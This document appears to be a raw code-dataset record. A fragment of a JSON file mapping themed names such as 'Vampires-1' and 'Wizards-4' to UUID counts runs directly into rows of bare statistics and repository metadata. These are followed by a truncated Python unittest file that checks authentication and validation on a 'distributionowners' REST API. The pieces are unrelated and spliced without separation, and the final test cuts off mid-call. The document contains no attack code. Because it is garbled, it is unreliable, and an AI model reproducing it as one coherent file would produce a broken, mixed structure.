"id": "77cf9d11-936f-4e02-8595-0cbcabaafb1e",
"count": 1
},
{
"id": "79cabbe0-1c44-4888-8ebc-25a4c3e2c5d7",
"count": 1
},
{
"id": "a6712361-976a-4ef9-bae9-48505344904e",
"count": 7
}
],
"Tree Hugging-3": [
{
"id": "b8664d29-dacc-49cb-949f-e00ceeb75ff6",
"count": 1
},
{
"id": "3d0ec3bd-d894-4861-abcb-7b2e4f4de05c",
"count": 1
},
{
"id": "5f22116a-8b6a-4bbe-999f-7329e1e2b2d9",
"count": 1
},
{
"id": "f1ccd23e-c883-474b-93e5-4131aa1e6e8a",
"count": 1
},
{
"id": "d6e23afa-7e08-4049-baf0-d4d0134ba2c8",
"count": 1
},
{
"id": "46700ccc-0975-49d1-b3fc-edb1eda3b624",
"count": 1
},
{
"id": "f836b155-8829-460b-91f8-4cd00b988196",
"count": 1
},
{
"id": "f1d81cfc-cff8-4478-92b6-efbfc5084165",
"count": 1
},
{
"id": "ff69e6a8-f34f-4aea-9a54-c4b64ed3116c",
"count": 1
},
{
"id": "01398f5f-f38e-45a7-b755-e65c8fa779f8",
"count": 1
},
{
"id": "8ea6c234-ede2-4543-ab8e-38d7a503a5e1",
"count": 1
},
{
"id": "77cf9d11-936f-4e02-8595-0cbcabaafb1e",
"count": 1
},
{
"id": "79cabbe0-1c44-4888-8ebc-25a4c3e2c5d7",
"count": 1
},
{
"id": "a6712361-976a-4ef9-bae9-48505344904e",
"count": 7
}
],
"Tree Hugging-4": [
{
"id": "3d0ec3bd-d894-4861-abcb-7b2e4f4de05c",
"count": 1
},
{
"id": "5f22116a-8b6a-4bbe-999f-7329e1e2b2d9",
"count": 1
},
{
"id": "d6e23afa-7e08-4049-baf0-d4d0134ba2c8",
"count": 1
},
{
"id": "46700ccc-0975-49d1-b3fc-edb1eda3b624",
"count": 1
},
{
"id": "d7ce9104-0ad3-4d3d-bb2c-c456c25030f6",
"count": 1
},
{
"id": "f836b155-8829-460b-91f8-4cd00b988196",
"count": 1
},
{
"id": "f1d81cfc-cff8-4478-92b6-efbfc5084165",
"count": 1
},
{
"id": "01398f5f-f38e-45a7-b755-e65c8fa779f8",
"count": 1
},
{
"id": "9d44ec73-169a-4354-8ee1-238b8abd8d81",
"count": 1
},
{
"id": "8ea6c234-ede2-4543-ab8e-38d7a503a5e1",
"count": 1
},
{
"id": "77cf9d11-936f-4e02-8595-0cbcabaafb1e",
"count": 1
},
{
"id": "50c915a4-a75f-40e7-b78a-9c304dcdd83e",
"count": 1
},
{
"id": "79cabbe0-1c44-4888-8ebc-25a4c3e2c5d7",
"count": 1
},
{
"id": "a6712361-976a-4ef9-bae9-48505344904e",
"count": 7
}
],
"Under the Sea-1": [
{
"id": "7003ebae-5d82-4360-ae63-0e51c37977ed",
"count": 1
},
{
"id": "fbbb3f9d-8629-4815-8b7d-f8ec9368b9b0",
"count": 1
},
{
"id": "143052f0-4fcc-4703-9147-75b65ddb8e0f",
"count": 1
},
{
"id": "7a1a93c3-8561-4c65-bea8-a9c3a898a48c",
"count": 1
},
{
"id": "c2776694-6183-498d-9a38-e4c5c9e78179",
"count": 1
},
{
"id": "abb47990-a5a9-4a22-a8bb-d229b17132c6",
"count": 1
},
{
"id": "a61a7809-4bef-48e9-afbc-e473eb7072e8",
"count": 1
},
{
"id": "c55c60dc-40ed-4a36-9daa-702f79ffe818",
"count": 1
},
{
"id": "c82be2ca-8350-4cf5-83b6-e8b60a9e21c6",
"count": 1
},
{
"id": "ada68b91-3379-483e-93a0-b6c7c675c1dc",
"count": 1
},
{
"id": "b7d3681a-78d8-469f-9109-5f8faf04b707",
"count": 1
},
{
"id": "7eb8fd94-2b59-4b05-b4d0-c93497301d19",
"count": 1
},
{
"id": "c4a837f2-dbb0-435f-adf9-7632b97f94ab",
"count": 8
}
],
"Under the Sea-2": [
{
"id": "7003ebae-5d82-4360-ae63-0e51c37977ed",
"count": 1
},
{
"id": "6a636f74-3bac-4b88-a24f-32a66a94e340",
"count": 1
},
{
"id": "fbbb3f9d-8629-4815-8b7d-f8ec9368b9b0",
"count": 1
},
{
"id": "143052f0-4fcc-4703-9147-75b65ddb8e0f",
"count": 1
},
{
"id": "7a1a93c3-8561-4c65-bea8-a9c3a898a48c",
"count": 1
},
{
"id": "abb47990-a5a9-4a22-a8bb-d229b17132c6",
"count": 1
},
{
"id": "a61a7809-4bef-48e9-afbc-e473eb7072e8",
"count": 1
},
{
"id": "cad50269-6e80-47ea-a027-fa274f904e86",
"count": 1
},
{
"id": "bc84fb92-bb66-4f1a-b360-f87fdbcd45b7",
"count": 1
},
{
"id": "ada68b91-3379-483e-93a0-b6c7c675c1dc",
"count": 1
},
{
"id": "b7d3681a-78d8-469f-9109-5f8faf04b707",
"count": 1
},
{
"id": "7eb8fd94-2b59-4b05-b4d0-c93497301d19",
"count": 1
},
{
"id": "c4a837f2-dbb0-435f-adf9-7632b97f94ab",
"count": 8
}
],
"Unicorns": [
{
"id": "0fc18921-59f5-413f-a221-dc47d31b2ec8",
"count": 1
},
{
"id": "ff87a671-054f-4357-8a62-450d36559a1b",
"count": 1
},
{
"id": "f74dfd07-d17c-4890-82c3-4b12a6029940",
"count": 1
},
{
"id": "3320865c-ef02-4f18-82b0-47a6d845de0f",
"count": 1
},
{
"id": "e321bbb0-1660-4452-a9b7-d41674f7f743",
"count": 1
},
{
"id": "cb993412-69bc-4000-ac8f-b2f62161fc55",
"count": 1
},
{
"id": "aa01cb8c-f080-456b-a91a-f1d7943a70b2",
"count": 1
},
{
"id": "8bc7fdf0-3e1e-487c-833d-7c74aa02c0c1",
"count": 1
},
{
"id": "e9822b57-8e42-4158-981d-f0b0b0646fc9",
"count": 1
},
{
"id": "20516400-b37a-46d2-89c8-d6be88f5ab3d",
"count": 1
},
{
"id": "ff80029e-650e-469d-8393-0edf7d9cd695",
"count": 1
},
{
"id": "8e742d49-e6f0-4016-ba4c-11878fad89cb",
"count": 1
},
{
"id": "fe424eb3-7df8-4317-8776-6d960afbb90a",
"count": 1
},
{
"id": "c0690e60-e11e-4903-b1e0-e36854213b65",
"count": 7
}
],
"Vampires-1": [
{
"id": "465d8c18-c76b-488a-a4ec-ec0d2267a307",
"count": 1
},
{
"id": "b1c6df1d-7709-41e4-a79f-0dc722600191",
"count": 1
},
{
"id": "8644d4d1-8499-40a8-a01f-68172c82bf58",
"count": 1
},
{
"id": "a1b4f7ec-ea2e-4d90-98cd-0c92bd9f64c1",
"count": 1
},
{
"id": "98527faa-9d06-4f46-b2f7-c78aedacc3a4",
"count": 1
},
{
"id": "487aced8-e018-4c93-8e13-bb68b43096a4",
"count": 1
},
{
"id": "ff5444cb-0ecd-4482-a8d8-09332f382dbd",
"count": 1
},
{
"id": "f8a52a83-0087-4df3-995a-45e15bf664b4",
"count": 1
},
{
"id": "3532a279-b8e1-4124-bcd7-d7f4c71673eb",
"count": 1
},
{
"id": "abfcd08a-cfb5-4d34-b950-f57a88c5cb8e",
"count": 1
},
{
"id": "05d3b392-cbd0-437a-a21f-a36d5093a719",
"count": 1
},
{
"id": "5bbc405d-0cfb-45c6-baa1-75845d82e713",
"count": 1
},
{
"id": "18756fe5-70f0-48d9-a4f1-ea78f77d2084",
"count": 1
},
{
"id": "59e597d5-37e7-4add-b454-c3399b4e3704",
"count": 7
}
],
"Vampires-2": [
{
"id": "59d0839b-a021-4227-aa0f-1fa2ff806892",
"count": 1
},
{
"id": "b1c6df1d-7709-41e4-a79f-0dc722600191",
"count": 1
},
{
"id": "3887af00-a87d-4396-b82b-38b88c084e8e",
"count": 1
},
{
"id": "8644d4d1-8499-40a8-a01f-68172c82bf58",
"count": 1
},
{
"id": "a1b4f7ec-ea2e-4d90-98cd-0c92bd9f64c1",
"count": 1
},
{
"id": "487aced8-e018-4c93-8e13-bb68b43096a4",
"count": 1
},
{
"id": "ff5444cb-0ecd-4482-a8d8-09332f382dbd",
"count": 1
},
{
"id": "f8a52a83-0087-4df3-995a-45e15bf664b4",
"count": 1
},
{
"id": "3532a279-b8e1-4124-bcd7-d7f4c71673eb",
"count": 1
},
{
"id": "abfcd08a-cfb5-4d34-b950-f57a88c5cb8e",
"count": 1
},
{
"id": "05d3b392-cbd0-437a-a21f-a36d5093a719",
"count": 1
},
{
"id": "5bbc405d-0cfb-45c6-baa1-75845d82e713",
"count": 1
},
{
"id": "18756fe5-70f0-48d9-a4f1-ea78f77d2084",
"count": 1
},
{
"id": "59e597d5-37e7-4add-b454-c3399b4e3704",
"count": 7
}
],
"Vampires-3": [
{
"id": "b1c6df1d-7709-41e4-a79f-0dc722600191",
"count": 1
},
{
"id": "8644d4d1-8499-40a8-a01f-68172c82bf58",
"count": 1
},
{
"id": "a1b4f7ec-ea2e-4d90-98cd-0c92bd9f64c1",
"count": 1
},
{
"id": "487aced8-e018-4c93-8e13-bb68b43096a4",
"count": 1
},
{
"id": "9cdebdfd-a29b-4482-ab83-012d5faba2e4",
"count": 1
},
{
"id": "de652420-eacf-4f9d-9f13-c6bc02b0fa72",
"count": 1
},
{
"id": "ff5444cb-0ecd-4482-a8d8-09332f382dbd",
"count": 1
},
{
"id": "c7649d57-3537-45a2-b57e-98e7d32025c9",
"count": 1
},
{
"id": "3532a279-b8e1-4124-bcd7-d7f4c71673eb",
"count": 1
},
{
"id": "abfcd08a-cfb5-4d34-b950-f57a88c5cb8e",
"count": 1
},
{
"id": "05d3b392-cbd0-437a-a21f-a36d5093a719",
"count": 1
},
{
"id": "b1653811-1c2c-4e6c-bf1c-287d1b496d51",
"count": 1
},
{
"id": "18756fe5-70f0-48d9-a4f1-ea78f77d2084",
"count": 1
},
{
"id": "59e597d5-37e7-4add-b454-c3399b4e3704",
"count": 7
}
],
"Vampires-4": [
{
"id": "b1c6df1d-7709-41e4-a79f-0dc722600191",
"count": 1
},
{
"id": "3887af00-a87d-4396-b82b-38b88c084e8e",
"count": 1
},
{
"id": "31d0c37f-ebce-4362-9400-6b9a6e439247",
"count": 1
},
{
"id": "a60b3c77-62e4-4718-9ddb-cb2e3f1f861f",
"count": 1
},
{
"id": "8644d4d1-8499-40a8-a01f-68172c82bf58",
"count": 1
},
{
"id": "a1b4f7ec-ea2e-4d90-98cd-0c92bd9f64c1",
"count": 1
},
{
"id": "487aced8-e018-4c93-8e13-bb68b43096a4",
"count": 1
},
{
"id": "ff5444cb-0ecd-4482-a8d8-09332f382dbd",
"count": 1
},
{
"id": "3532a279-b8e1-4124-bcd7-d7f4c71673eb",
"count": 1
},
{
"id": "abfcd08a-cfb5-4d34-b950-f57a88c5cb8e",
"count": 1
},
{
"id": "05d3b392-cbd0-437a-a21f-a36d5093a719",
"count": 1
},
{
"id": "d908bf00-86ba-4911-b15b-1af2a79dff85",
"count": 1
},
{
"id": "18756fe5-70f0-48d9-a4f1-ea78f77d2084",
"count": 1
},
{
"id": "59e597d5-37e7-4add-b454-c3399b4e3704",
"count": 7
}
],
"Walls": [
{
"id": "53847a21-aded-4aaa-9bf1-8592e67763ef",
"count": 1
},
{
"id": "ef5abd21-9736-4e9e-b195-813461cfcd0a",
"count": 1
},
{
"id": "084446ca-fec5-446f-b6f8-edf32ecb57e3",
"count": 1
},
{
"id": "50974264-b509-4df9-802b-623805a4cbee",
"count": 1
},
{
"id": "d1abd95a-4ecc-479c-b200-5aaf7c993ef8",
"count": 1
},
{
"id": "9e64bc76-c6df-4b3c-b37f-f9386d30cab9",
"count": 1
},
{
"id": "a2c3eac5-3354-44ce-97c2-bafce78433ca",
"count": 1
},
{
"id": "f836b155-8829-460b-91f8-4cd00b988196",
"count": 1
},
{
"id": "9f7b7563-752b-4391-95d1-f5e3960d35c1",
"count": 1
},
{
"id": "01398f5f-f38e-45a7-b755-e65c8fa779f8",
"count": 1
},
{
"id": "f7321473-5747-4430-86b2-b5029d9f6486",
"count": 1
},
{
"id": "6bf261c8-98e4-491e-9e51-a9058ff2c03a",
"count": 1
},
{
"id": "79cabbe0-1c44-4888-8ebc-25a4c3e2c5d7",
"count": 1
},
{
"id": "30a4d3de-e004-4a15-9f45-4d50813de533",
"count": 7
}
],
"Well Read-1": [
{
"id": "40dfe354-d527-4f56-8457-b95884700a40",
"count": 1
},
{
"id": "cb33529b-80bd-4f52-94cc-d8371c53ad75",
"count": 1
},
{
"id": "61921b05-ee83-4768-a405-4d3355c0ad6e",
"count": 1
},
{
"id": "711412f1-9ab3-48b6-91a4-77232b416a32",
"count": 1
},
{
"id": "efedf97b-8901-4558-8bd0-3f488097f686",
"count": 1
},
{
"id": "7b14ff70-6817-4539-b19b-142f8f6b6b1f",
"count": 1
},
{
"id": "c2776694-6183-498d-9a38-e4c5c9e78179",
"count": 1
},
{
"id": "0360d27b-37e1-4e00-9cfc-b574efc38ea0",
"count": 1
},
{
"id": "323db259-d35e-467d-9a46-4adcb2fc107c",
"count": 1
},
{
"id": "c5a0be10-c20f-4ac0-89a5-1770ecf48aad",
"count": 1
},
{
"id": "95681c43-ba2e-41a5-8a51-e66db8ec6cb9",
"count": 1
},
{
"id": "c82be2ca-8350-4cf5-83b6-e8b60a9e21c6",
"count": 1
},
{
"id": "7eb8fd94-2b59-4b05-b4d0-c93497301d19",
"count": 1
},
{
"id": "b5a4dfac-2a47-48be-8611-d7f69e261c60",
"count": 7
}
],
"Well Read-2": [
{
"id": "40dfe354-d527-4f56-8457-b95884700a40",
"count": 1
},
{
"id": "cb33529b-80bd-4f52-94cc-d8371c53ad75",
"count": 1
},
{
"id": "61921b05-ee83-4768-a405-4d3355c0ad6e",
"count": 1
},
{
"id": "711412f1-9ab3-48b6-91a4-77232b416a32",
"count": 1
},
{
"id": "efedf97b-8901-4558-8bd0-3f488097f686",
"count": 1
},
{
"id": "c2776694-6183-498d-9a38-e4c5c9e78179",
"count": 1
},
{
"id": "0360d27b-37e1-4e00-9cfc-b574efc38ea0",
"count": 1
},
{
"id": "323db259-d35e-467d-9a46-4adcb2fc107c",
"count": 1
},
{
"id": "416a2796-08c7-4370-8bc5-2152877e9034",
"count": 1
},
{
"id": "f5ed9f08-56e8-4e24-aae2-05270d7c1ba8",
"count": 1
},
{
"id": "c5a0be10-c20f-4ac0-89a5-1770ecf48aad",
"count": 1
},
{
"id": "c82be2ca-8350-4cf5-83b6-e8b60a9e21c6",
"count": 1
},
{
"id": "7eb8fd94-2b59-4b05-b4d0-c93497301d19",
"count": 1
},
{
"id": "b5a4dfac-2a47-48be-8611-d7f69e261c60",
"count": 7
}
],
"Well Read-3": [
{
"id": "149d4f00-106b-4aa7-a667-6360d2e149e7",
"count": 1
},
{
"id": "40dfe354-d527-4f56-8457-b95884700a40",
"count": 1
},
{
"id": "cb33529b-80bd-4f52-94cc-d8371c53ad75",
"count": 1
},
{
"id": "61921b05-ee83-4768-a405-4d3355c0ad6e",
"count": 1
},
{
"id": "efedf97b-8901-4558-8bd0-3f488097f686",
"count": 1
},
{
"id": "7b14ff70-6817-4539-b19b-142f8f6b6b1f",
"count": 1
},
{
"id": "c2776694-6183-498d-9a38-e4c5c9e78179",
"count": 1
},
{
"id": "0360d27b-37e1-4e00-9cfc-b574efc38ea0",
"count": 1
},
{
"id": "323db259-d35e-467d-9a46-4adcb2fc107c",
"count": 1
},
{
"id": "c5a0be10-c20f-4ac0-89a5-1770ecf48aad",
"count": 1
},
{
"id": "95681c43-ba2e-41a5-8a51-e66db8ec6cb9",
"count": 1
},
{
"id": "d6914dba-0d27-4055-ac34-b3ebf5802221",
"count": 1
},
{
"id": "7eb8fd94-2b59-4b05-b4d0-c93497301d19",
"count": 1
},
{
"id": "b5a4dfac-2a47-48be-8611-d7f69e261c60",
"count": 7
}
],
"Well Read-4": [
{
"id": "149d4f00-106b-4aa7-a667-6360d2e149e7",
"count": 1
},
{
"id": "cb33529b-80bd-4f52-94cc-d8371c53ad75",
"count": 1
},
{
"id": "de19d2db-604b-4d5f-8184-9bb0a31c7405",
"count": 1
},
{
"id": "61921b05-ee83-4768-a405-4d3355c0ad6e",
"count": 1
},
{
"id": "efedf97b-8901-4558-8bd0-3f488097f686",
"count": 1
},
{
"id": "7b14ff70-6817-4539-b19b-142f8f6b6b1f",
"count": 1
},
{
"id": "c2776694-6183-498d-9a38-e4c5c9e78179",
"count": 1
},
{
"id": "0360d27b-37e1-4e00-9cfc-b574efc38ea0",
"count": 1
},
{
"id": "323db259-d35e-467d-9a46-4adcb2fc107c",
"count": 1
},
{
"id": "2c65088f-bbbd-4e8d-b482-58181069bef2",
"count": 1
},
{
"id": "f5ed9f08-56e8-4e24-aae2-05270d7c1ba8",
"count": 1
},
{
"id": "c5a0be10-c20f-4ac0-89a5-1770ecf48aad",
"count": 1
},
{
"id": "7eb8fd94-2b59-4b05-b4d0-c93497301d19",
"count": 1
},
{
"id": "b5a4dfac-2a47-48be-8611-d7f69e261c60",
"count": 7
}
],
"Witchcraft-1": [
{
"id": "99a14228-3716-4448-a8c3-93928b9b85d6",
"count": 1
},
{
"id": "6ce1aa49-fe00-4390-8c4b-d1203cc337cd",
"count": 1
},
{
"id": "32cf273e-b8f7-434b-9d5d-883dfd6f7423",
"count": 1
},
{
"id": "c9d7d31e-eaa7-4edf-8e98-5a191ec3b91d",
"count": 2
},
{
"id": "24fe5c92-7da2-47b5-ad13-f95590e93ac2",
"count": 1
},
{
"id": "8adbd4a5-3171-495a-a540-0ecf280b77fc",
"count": 1
},
{
"id": "f484f19a-0121-4173-a70b-6698cc5f6303",
"count": 1
},
{
"id": "2c6e5b25-b721-45ee-894a-697de1310b8c",
"count": 1
},
{
"id": "2b85a552-2119-4d9c-b7c1-c09c2d9f2f38",
"count": 1
},
{
"id": "955aa79b-448e-4752-8e36-0fe80c18280c",
"count": 1
},
{
"id": "d43a3eb7-3daf-4667-b824-1f5d801c9341",
"count": 1
},
{
"id": "18756fe5-70f0-48d9-a4f1-ea78f77d2084",
"count": 1
},
{
"id": "00030770-5e99-4943-819d-8d807c24cc14",
"count": 7
}
],
"Witchcraft-2": [
{
"id": "c90a12af-b453-4d83-9a14-5411b562d480",
"count": 1
},
{
"id": "99a14228-3716-4448-a8c3-93928b9b85d6",
"count": 1
},
{
"id": "6ce1aa49-fe00-4390-8c4b-d1203cc337cd",
"count": 1
},
{
"id": "c9d7d31e-eaa7-4edf-8e98-5a191ec3b91d",
"count": 2
},
{
"id": "d9fb56fc-47a4-44ba-8b55-4d0ceb8ce62f",
"count": 1
},
{
"id": "8adbd4a5-3171-495a-a540-0ecf280b77fc",
"count": 1
},
{
"id": "f484f19a-0121-4173-a70b-6698cc5f6303",
"count": 1
},
{
"id": "2c6e5b25-b721-45ee-894a-697de1310b8c",
"count": 1
},
{
"id": "05d3b392-cbd0-437a-a21f-a36d5093a719",
"count": 1
},
{
"id": "51278b56-5056-4a37-a1e8-daca45d8e360",
"count": 1
},
{
"id": "955aa79b-448e-4752-8e36-0fe80c18280c",
"count": 1
},
{
"id": "18756fe5-70f0-48d9-a4f1-ea78f77d2084",
"count": 1
},
{
"id": "00030770-5e99-4943-819d-8d807c24cc14",
"count": 7
}
],
"Wizards-1": [
{
"id": "c6344ecd-ca57-4104-a77a-d7d14264776d",
"count": 1
},
{
"id": "92c17066-c551-4aed-9258-1e5ed947385b",
"count": 1
},
{
"id": "59d38ef7-5017-4ea3-b97f-a8fe12d03e98",
"count": 1
},
{
"id": "3d89c1a1-1896-4360-b123-52d82a6871d4",
"count": 1
},
{
"id": "a52e90c0-b012-4ce5-8462-1e33c7143de5",
"count": 1
},
{
"id": "5360fe8c-41b0-4409-b03e-072f129fb352",
"count": 1
},
{
"id": "4b153c2f-fc87-49bc-9d1e-d5e7e25b2142",
"count": 1
},
{
"id": "a48ebd79-95d7-4860-9785-45e34a94755d",
"count": 1
},
{
"id": "94c1f80e-65b7-4534-bfd4-1ae88274945b",
"count": 1
},
{
"id": "393fc485-d3c1-4826-933d-89f66df769d4",
"count": 1
},
{
"id": "323db259-d35e-467d-9a46-4adcb2fc107c",
"count": 1
},
{
"id": "979cd394-80ce-4559-9f3a-57cd84299182",
"count": 1
},
{
"id": "7eb8fd94-2b59-4b05-b4d0-c93497301d19",
"count": 1
},
{
"id": "76b4a655-0051-47c6-a683-c4c3f56e45fc",
"count": 7
}
],
"Wizards-2": [
{
"id": "ac4e2977-b518-4fa3-83e4-5af326ded290",
"count": 1
},
{
"id": "c6344ecd-ca57-4104-a77a-d7d14264776d",
"count": 1
},
{
"id": "92c17066-c551-4aed-9258-1e5ed947385b",
"count": 1
},
{
"id": "3a0b3006-16cb-4752-908e-3c9f37ac249c",
"count": 1
},
{
"id": "59d38ef7-5017-4ea3-b97f-a8fe12d03e98",
"count": 1
},
{
"id": "a52e90c0-b012-4ce5-8462-1e33c7143de5",
"count": 1
},
{
"id": "5360fe8c-41b0-4409-b03e-072f129fb352",
"count": 1
},
{
"id": "4b153c2f-fc87-49bc-9d1e-d5e7e25b2142",
"count": 1
},
{
"id": "a48ebd79-95d7-4860-9785-45e34a94755d",
"count": 1
},
{
"id": "323db259-d35e-467d-9a46-4adcb2fc107c",
"count": 1
},
{
"id": "b19de7a5-c291-405b-a2e6-8d3ac56e6570",
"count": 1
},
{
"id": "979cd394-80ce-4559-9f3a-57cd84299182",
"count": 1
},
{
"id": "7eb8fd94-2b59-4b05-b4d0-c93497301d19",
"count": 1
},
{
"id": "8c6eadd8-71d8-4a87-8395-efe8cc9f0676",
"count": 1
},
{
"id": "76b4a655-0051-47c6-a683-c4c3f56e45fc",
"count": 6
}
],
"Wizards-3": [
{
"id": "92c17066-c551-4aed-9258-1e5ed947385b",
"count": 1
},
{
"id": "59d38ef7-5017-4ea3-b97f-a8fe12d03e98",
"count": 1
},
{
"id": "3d89c1a1-1896-4360-b123-52d82a6871d4",
"count": 1
},
{
"id": "5449d71c-5c1b-44c6-9407-0212aa3c3e3a",
"count": 1
},
{
"id": "a52e90c0-b012-4ce5-8462-1e33c7143de5",
"count": 1
},
{
"id": "5360fe8c-41b0-4409-b03e-072f129fb352",
"count": 1
},
{
"id": "4b153c2f-fc87-49bc-9d1e-d5e7e25b2142",
"count": 1
},
{
"id": "a48ebd79-95d7-4860-9785-45e34a94755d",
"count": 1
},
{
"id": "323db259-d35e-467d-9a46-4adcb2fc107c",
"count": 1
},
{
"id": "2dc0bafd-debc-4b62-9fe0-56b4aad02484",
"count": 1
},
{
"id": "979cd394-80ce-4559-9f3a-57cd84299182",
"count": 1
},
{
"id": "f5ed9f08-56e8-4e24-aae2-05270d7c1ba8",
"count": 1
},
{
"id": "7eb8fd94-2b59-4b05-b4d0-c93497301d19",
"count": 1
},
{
"id": "76b4a655-0051-47c6-a683-c4c3f56e45fc",
"count": 7
}
],
"Wizards-4": [
{
"id": "fc3765b7-bd99-4c66-8761-1c9cc5bd8666",
"count": 1
},
{
"id": "92c17066-c551-4aed-9258-1e5ed947385b",
"count": 1
},
{
"id": "59d38ef7-5017-4ea3-b97f-a8fe12d03e98",
"count": 1
},
{
"id": "4bb9ac55-4bb4-4447-b214-6a108ddb3f07",
"count": 1
},
{
"id": "5449d71c-5c1b-44c6-9407-0212aa3c3e3a",
"count": 1
},
{
"id": "a52e90c0-b012-4ce5-8462-1e33c7143de5",
"count": 1
},
{
"id": "5360fe8c-41b0-4409-b03e-072f129fb352",
"count": 1
},
{
"id": "4b153c2f-fc87-49bc-9d1e-d5e7e25b2142",
"count": 1
},
{
"id": "393fc485-d3c1-4826-933d-89f66df769d4",
"count": 1
},
{
"id": "e7d0f29b-fcc4-4135-af36-6539912ab3bb",
"count": 1
},
{
"id": "da367981-9d6f-419f-9f58-f969b6183336",
"count": 1
},
{
"id": "979cd394-80ce-4559-9f3a-57cd84299182",
"count": 1
},
{
"id": "7eb8fd94-2b59-4b05-b4d0-c93497301d19",
"count": 1
},
{
"id": "76b4a655-0051-47c6-a683-c4c3f56e45fc",
"count": 7
}
]
}
| 20.177405
| 51
| 0.486443
| 13,745
| 140,919
| 4.987268
| 0.236377
| 0.069409
| 0.181007
| 0.005602
| 0.849249
| 0.849249
| 0.849249
| 0.849249
| 0.849249
| 0.837695
| 0
| 0.375456
| 0.317147
| 140,919
| 6,984
| 52
| 20.177406
| 0.336912
| 0
| 0
| 0.460052
| 0
| 0
| 0.523223
| 0.43046
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
c64f61d47b0131e23bc719477de97ae043b68c4b
| 9,903
|
py
|
Python
|
appsrc/tests/test_distributionowners.py
|
arieunier/covid19-bookable-slot
|
5869edebf3dbd84bb493ceefd5008e3d7b2307c7
|
[
"MIT"
] | null | null | null |
appsrc/tests/test_distributionowners.py
|
arieunier/covid19-bookable-slot
|
5869edebf3dbd84bb493ceefd5008e3d7b2307c7
|
[
"MIT"
] | null | null | null |
appsrc/tests/test_distributionowners.py
|
arieunier/covid19-bookable-slot
|
5869edebf3dbd84bb493ceefd5008e3d7b2307c7
|
[
"MIT"
] | 1
|
2020-06-02T23:35:39.000Z
|
2020-06-02T23:35:39.000Z
|
import os
import unittest
from appsrc import app
from libs import variables
import appsrc.tests.utils
import ujson
class TestCases(unittest.TestCase):
def setUp(self):
appsrc.tests.utils.fillDb()
appsrc.tests.utils.purgeCookies()
pass
def tearDown(self):
pass
def test_access_unauthenticated(self):
# authenticates properly
result, code = appsrc.tests.utils.HTTP_GET(variables.DEFAULT_API_URL + '/login', {"Authorization": appsrc.tests.utils.authorizationHeader(variables.DEFAULT_ADMIN_USERNAME, variables.DEFAULT_ADMIN_PASSWORD)}, {}, {})
session_cookie=result.headers.getlist('Set-Cookie')
self.assertIsNotNone(session_cookie)
self.assertEqual(code, 200)
# gets a real distribution owner and saves it for later purpose
result, code = appsrc.tests.utils.HTTP_GET(variables.DEFAULT_API_URL + '/distributionowners', {'cookie':session_cookie}, {}, {})
self.assertEqual(code, 200)
distributionOwnerId = result.json[0]['id']
# flush sessions
appsrc.tests.utils.purgeCookies()
# tries to get all distributin owner, must succeed
result, code = appsrc.tests.utils.HTTP_GET(variables.DEFAULT_API_URL + '/distributionowners', {}, {}, {})
self.assertEqual(code, 200)
# tries to get one distribution owner, must work
result, code = appsrc.tests.utils.HTTP_GET(variables.DEFAULT_API_URL + '/distributionowners/' + distributionOwnerId, {}, {}, {})
self.assertEqual(code, 200)
# tries to POST a distribution owner, must fail
result, code = appsrc.tests.utils.HTTP_POST(variables.DEFAULT_API_URL + '/distributionowners',
{},
{},
ujson.dumps({"name":"name"}))
self.assertEqual(code, 401)
# tries to PUT a distribution owner, must fail
result, code = appsrc.tests.utils.HTTP_PUT(variables.DEFAULT_API_URL + '/distributionowners/' + distributionOwnerId,
{},
{},
ujson.dumps({"name":"enwnames"}))
self.assertEqual(code, 401)
def test_access_authenticated(self):
# authenticates properly
result, code = appsrc.tests.utils.HTTP_GET(variables.DEFAULT_API_URL + '/login', {"Authorization": appsrc.tests.utils.authorizationHeader(variables.DEFAULT_ADMIN_USERNAME, variables.DEFAULT_ADMIN_PASSWORD)}, {}, {})
session_cookie=result.headers.getlist('Set-Cookie')
self.assertIsNotNone(session_cookie)
self.assertEqual(code, 200)
# gets a real distribution owner and saves it for later purpose
result, code = appsrc.tests.utils.HTTP_GET(variables.DEFAULT_API_URL + '/distributionowners', {'cookie':session_cookie}, {}, {})
self.assertEqual(code, 200)
distributionOwnerList = result.json
distributionOwnerId = distributionOwnerList[0]['id']
nbDistributionOwner = len(result.json)
# updates default DO with an incorrect value
result, code = appsrc.tests.utils.HTTP_PUT(variables.DEFAULT_API_URL + '/distributionowners/' + distributionOwnerId,
{'cookie':session_cookie},
{},
ujson.dumps({"name":""}))
self.assertEqual(code, 500)
print(result.json)
# updates default DO with a correct value
result, code = appsrc.tests.utils.HTTP_PUT(variables.DEFAULT_API_URL + '/distributionowners/' + distributionOwnerId,
{'cookie':session_cookie},
{},
ujson.dumps({"name":"ANewValue"}))
self.assertEqual(code, 200)
self.assertEqual(result.json['name'], 'ANewValue')
# creates a new DO -> wrong value & no references filled
result, code = appsrc.tests.utils.HTTP_POST(variables.DEFAULT_API_URL + '/distributionowners',
{'cookie':session_cookie},
{},
ujson.dumps({"name":""}))
self.assertEqual(code, 500)
# check it has NOT BEEN ADDED
result, code = appsrc.tests.utils.HTTP_GET(variables.DEFAULT_API_URL + '/distributionowners', {'cookie':session_cookie}, {}, {})
self.assertEqual(len(result.json), nbDistributionOwner)
result, code = appsrc.tests.utils.HTTP_POST(variables.DEFAULT_API_URL + '/distributionowners',
{'cookie':session_cookie},
{},
ujson.dumps({"name":"correct", "logoUrl":""}))
self.assertEqual(code, 500)
# check it has NOT BEEN ADDED
result, code = appsrc.tests.utils.HTTP_GET(variables.DEFAULT_API_URL + '/distributionowners', {'cookie':session_cookie}, {}, {})
self.assertEqual(len(result.json), nbDistributionOwner)
result, code = appsrc.tests.utils.HTTP_POST(variables.DEFAULT_API_URL + '/distributionowners',
{'cookie':session_cookie},
{},
ujson.dumps({"name":"correct", "logoUrl":"www.google.fr", "telephone":""}))
self.assertEqual(code, 500)
# check it has NOT BEEN ADDED
result, code = appsrc.tests.utils.HTTP_GET(variables.DEFAULT_API_URL + '/distributionowners', {'cookie':session_cookie}, {}, {})
self.assertEqual(len(result.json), nbDistributionOwner)
result, code = appsrc.tests.utils.HTTP_POST(variables.DEFAULT_API_URL + '/distributionowners',
{'cookie':session_cookie},
{},
ujson.dumps({"name":"correct", "logoUrl":"www.google.fr", "telephone":"01232132131", "email":""}))
